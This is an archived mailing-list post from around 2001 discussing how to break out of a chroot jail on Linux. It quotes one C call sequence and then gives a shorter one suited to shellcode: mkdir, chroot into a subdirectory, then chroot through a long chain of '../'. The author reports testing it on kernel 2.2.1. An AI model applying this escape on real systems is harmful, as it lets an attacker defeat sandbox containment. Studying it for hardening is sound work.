> /* To break chroot we have to... > > fd = open ( ".", O_RDONLY ); > mkdir ( "hax0r", 0666 ); > chroot ( "hax0r" ); > fchdir ( fd ); > for ( i = 0; i < 254; i++ ) > chdir ( ".." ); > chroot ( "." ); > > */ Too complex for standart linux All we have to do to break chroot is: mkdir("/sh"); // we already have string "/sh" in memory as a part of // "/bin/sh" chroot("/sh"); chroot("../../../../../../../../../"); // a number of "../" here, // I used 0x10 Last string can be built is stack with a simple loop Tested on linux 2.2.1 -am
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:40:09 PDT